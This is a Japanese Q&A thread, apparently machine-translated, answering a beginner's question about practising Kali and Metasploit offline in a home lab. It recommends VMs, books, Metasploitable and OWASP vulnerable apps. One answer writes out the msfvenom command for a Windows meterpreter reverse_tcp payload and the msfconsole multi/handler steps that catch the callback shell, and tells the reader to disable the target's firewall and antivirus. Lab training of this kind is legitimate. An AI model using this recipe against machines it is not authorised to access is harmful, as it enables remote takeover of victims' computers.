最近、Kali、特にMetasploitなどのフレームワークに興味を持ちました。インターネットにアクセスできないコンピュータが1台だけあるとしましょう。 Metasploitなど、Kaliでツールやフレームワークを使用する方法を学びたい。 Metasploitを使い始める方法を説明した本をたくさん見つけました。オフラインのまま、自分のコンピューターを攻撃者とターゲットの両方として使用する方法はありますか?
はい。ただし、その代わりに、VirtualBoxやVMwareなどの仮想化ソフトウェアを使用して、犠牲マシンまたは攻撃者マシンをインストールします(脆弱なマシンをインターネットに直接接続する必要はありません)。
Metasploit:The Penetration Tester's Guide のような本を読んでください。これはMetasploitの開発者が書いた素晴らしい本です。ただし、本のリリース以降、Metasploitの多くの機能が変更されており、更新版はありません。
したがって、私は 侵入テスト-ハッキングの実践的な紹介 を読むことをお勧めします。比較的新しくて良い本です。
ラボのセットアップ
本を読むと、独自のテストラボのセットアップ方法がガイドされます。細部のすべてのステップで。
問題
書籍の最大数はWindows XPから始まりますが、残念ながらMicrosoftはWindows XPのサポートを終了しました。したがって、XP設定を見つけるのに苦労します。WindowsXPを見つけても、書籍に記載されている脆弱性はパッチされます(オンラインのペンテストラボを使用している場合を除く) 、これについては後で説明します。)次に、「この本を読むことの用途は何ですか」と言うと、「既知の脆弱性を悪用する方法」および「その他の方法」に関するその他の多くの方法の基本がわかります。システムを危険にさらす」。
今後の章では、既知の脆弱性を悪用してシステムにアクセスし、悪用後(つまり、システムが危険にさらされた場合の対処法)について説明します。 「エクスプロイト」に関する章は1つありますが、たまにポストエクスプロイトのいくつかのトリックを使用する必要があります。
パッチを当てた脆弱性について何もできないことがイライラするでしょう。以下では、コンピュータを危険にさらすための小さなトリックについて説明します。そのため、次の章まで、エクスプロイテーションを楽しむことができます。
ソリューション:
あなたがWindows XPを見つけて、パッチが適用されていて、エクスプロイテーションを楽しみたいとします。
次の手順に従ってください。
_Open a terminal
_
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ip of your machine) LPORT=(port you want to connect back to) -f exe > filename.exe
このファイルを被害者のマシンに転送し、すべてのAVによって検出されるため、WindowsファイアウォールとAVを無効にします(これは、システムを危険にさらすための良い方法ではありませんが、エクスプロイテーションを学ぶには、使用できます)。すべての手順が完了するまで、ファイルを開かないでください。
もう一度ターミナルを開いて、
msfconsole
_use multi/handler
_
_set payload windows/meterpreter/reverse_tcp
_
_set LHOST XXX.XXX.XX.X
_
_set LPORT XXX
_
run
(このターミナルを閉じないでください。ここで、犠牲PCでファイルを実行した後、meterpreterセッションを取得します)
上記のすべての手順が完了したら、犠牲PCに移動して、生成されたexeファイルを実行できます。
フーラー! Meterpreterセッションを取得し、開発後の作業を楽しむことができます
[〜#〜]ノート[〜#〜]
1-本からラボをセットアップする方法を注意深く読んでください。そうしないと、上記で生成されたexeファイルが機能しません。
2- ifconfigと入力すると、IPアドレスを取得できます(これらはすべてラボの構成セクションに記載されているため、確認してください)。
3-指定した場所に同じLHOST値とLPORT値を入力したことを確認してください。
MegaTprimerセクションのMetasploitについてSecurityTubeから学ぶこともできます。ビデオは無料で視聴できますが、サブスクライブして、オンラインラボにアクセスできます。その後、上記のすべてのトラブルを経験する必要はありません。それはあなたの選択です。
これがお役に立てば幸いです。
[〜#〜]更新[〜#〜]
上記で生成されたファイルは、Windowsでのみ機能します。しかし、metasploitableのような脆弱なLinuxディストリビューションを使用することもできます。これらは特別に設計された脆弱なLinuxディストリビューションであり、メタスプロイタブルの活用方法に関するチュートリアルと本がいくつかあります。
自分でラボをセットアップする代わりに。簡単にセットアップするために使用できるツールがあります。
これらは、スキルをテストし、Kaliまたはmetasploitを使用してスキルを処理するための脆弱なアプリケーションです。
あなたが試すことができるアプリの非常に長いリストがあります
Owaspリストをチェックしてください here
何を学びたいかによります。 Metasploitは主にネットワークベースの攻撃用です。ただし、Webベースの攻撃がいくつか組み込まれています。
Metasploitで上記を試すことができます。
Metasploitable VMはmetasploit用です。
あなたが挑戦している場合。 Windowsマシンをダウンロードして、パッチを適用せずにテストすることができます。
ただし、反復する必要があります。ライブマシンでテストしないでくださいOR 1つIS自分では所有していません。